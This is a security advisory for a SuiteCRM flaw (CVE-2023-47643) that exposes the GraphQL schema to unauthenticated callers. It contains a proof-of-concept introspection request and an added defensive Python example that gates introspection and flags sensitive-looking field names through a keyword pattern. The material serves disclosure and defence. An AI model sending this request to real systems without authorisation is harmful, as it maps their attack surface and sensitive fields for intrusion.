CVE-2023-47643: Unauthenticated Graphql Introspection Enabled

SuiteCRM is a Customer Relationship Management (CRM) software application. Prior to version 8.4.2, GraphQL introspection is enabled without authentication, exposing the schema that defines all object types, arguments, and functions. An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash. This issue is patched in version 8.4.2. There are no known workarounds.


Impact

GraphQL introspection is enabled without authentication, exposing the schema that defines all object types, arguments, and functions.

An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash.

Proof of Concept

Send the following POST request, which will return the full introspection schema:

POST /api/graphql HTTP/2
Host: localhost
Cookie:....
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/
X-Xsrf-Token: ....
Content-Type: application/json
Content-Length: 1732
Origin: https://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{ "query": "
    query IntrospectionQuery {
        __schema {
            queryType { name }
            mutationType { name }
            subscriptionType { name }
            types {
                ...FullType
            }
            directives {
                name
                description
                args {
                    ...InputValue
                }
                onOperation   #Often needs to be deleted to run query
                onFragment    #Often needs to be deleted to run query
                onField       #Often needs to be deleted to run query
            }
        }
    }

    fragment FullType on __Type {
        kind
        name
        description
        fields(includeDeprecated: true) {
            name
            description
            args {
                ...InputValue
            }
            type {
                ...TypeRef
            }
            isDeprecated
            deprecationReason
        }
        inputFields {
            ...InputValue
        }
        interfaces {
            ...TypeRef
        }
        enumValues(includeDeprecated: true) {
            name
            description
            isDeprecated
            deprecationReason
        }
        possibleTypes {
            ...TypeRef
        }
    }

    fragment InputValue on __InputValue {
        name
        description
        type {
            ...TypeRef
        }
        defaultValue
    }

    fragment TypeRef on __Type {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
                ofType {
                    kind
                    name
                }
            }
        }
    }
"
}
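The request above is the advisory's own proof of concept. The following is an added example, not SuiteCRM code and not part of the advisory, showing the two things a defender would want around this class of issue: a request gate that recognises an introspection document (selecting __schema or __type) and refuses it unless the caller is authenticated and introspection is enabled, and an audit routine that walks an introspection response and flags field names that look sensitive, the way UserHash would. The policy, the sensitive-name pattern and all sample queries and the sample response are assumptions constructed for illustration.

```python
"""Added example (not SuiteCRM code): gate GraphQL introspection behind
authentication and audit an introspection result for sensitive field names.
Every sample query and response below is constructed for illustration."""
import re

# Introspection entry points defined by the GraphQL spec. `__typename` is a
# meta-field on every object and is deliberately NOT treated as introspection
# here because ordinary clients rely on it for normal queries.
INTROSPECTION_FIELDS = {"__schema", "__type"}

# Assumed heuristic for "sensitive looking" field names; tune per schema.
SENSITIVE_NAME = re.compile(r"(hash|password|passwd|secret|token|apikey|api_key)", re.I)


def strip_strings_and_comments(document: str) -> str:
    """Blank out string literals and '#' comments so that '__schema' inside a
    string argument or a commented-out line does not cause a false positive."""
    out, i, n = [], 0, len(document)
    while i < n:
        ch = document[i]
        if ch == '"':
            if document.startswith('"""', i):          # block string
                end = document.find('"""', i + 3)
                i = n if end == -1 else end + 3
            else:                                       # ordinary string
                i += 1
                while i < n and document[i] != '"':
                    if document[i] == "\\":
                        i += 1                          # skip escaped char
                    i += 1
                i += 1                                  # skip closing quote
            out.append(" ")
        elif ch == "#":                                 # comment to end of line
            while i < n and document[i] != "\n":
                i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def is_introspection_query(document: str) -> bool:
    """True if the document selects __schema or __type anywhere."""
    names = set(re.findall(r"[_A-Za-z][_0-9A-Za-z]*",
                           strip_strings_and_comments(document)))
    return bool(names & INTROSPECTION_FIELDS)


def gate_request(document: str, authenticated: bool, introspection_enabled: bool) -> str:
    """Assumed policy: introspection is answered only when it is enabled at all
    and only for authenticated callers; everything else passes through."""
    if not is_introspection_query(document):
        return "allow"
    if not introspection_enabled:
        return "deny: introspection disabled"
    if not authenticated:
        return "deny: authentication required for introspection"
    return "allow"


def find_sensitive_fields(introspection_result: dict) -> list:
    """Walk an introspection response and return 'Type.field' entries whose
    field name matches SENSITIVE_NAME, to see what an exposed schema reveals."""
    findings = []
    schema = introspection_result.get("data", {}).get("__schema", {})
    for typ in schema.get("types") or []:
        if typ.get("name", "").startswith("__"):
            continue                                    # skip meta-types
        for field in typ.get("fields") or []:
            if SENSITIVE_NAME.search(field.get("name", "")):
                findings.append(f"{typ['name']}.{field['name']}")
    return sorted(findings)


# Constructed sample: a shortened form of the advisory's introspection query.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema { queryType { name } types { ...FullType } }
}
fragment FullType on __Type { kind name fields { name } }
"""

# Constructed sample: mentions __schema only in a comment and a string
# argument, so it must NOT be classified as introspection.
ORDINARY_QUERY = """
# __schema is only mentioned in this comment
query { user(id: "__schema") { name __typename } }
"""

# Constructed sample response; not real SuiteCRM output.
SAMPLE_RESULT = {"data": {"__schema": {"types": [
    {"name": "User", "fields": [{"name": "id"}, {"name": "userName"}, {"name": "UserHash"}]},
    {"name": "Query", "fields": [{"name": "user"}]},
    {"name": "__Type", "fields": [{"name": "name"}]},
]}}}

if __name__ == "__main__":
    for q in (INTROSPECTION_QUERY, ORDINARY_QUERY):
        print(gate_request(q, authenticated=False, introspection_enabled=True))
    print(find_sensitive_fields(SAMPLE_RESULT))
```

The gate tokenises the document rather than substring-matching so that a comment or a string literal containing `__schema` does not trip it, and `__typename` is left alone because ordinary client queries use it; the audit function is the check to run once against a pre-8.4.2 schema dump to see which fields an unauthenticated caller could have learned about.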

Patches

Has the problem been patched? What versions should users upgrade to?
Patched in version 8.4.2

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

  • No workarounds

References

Are there any links users can visit to find out more?

  • Why it’s important to disable graphql introspection
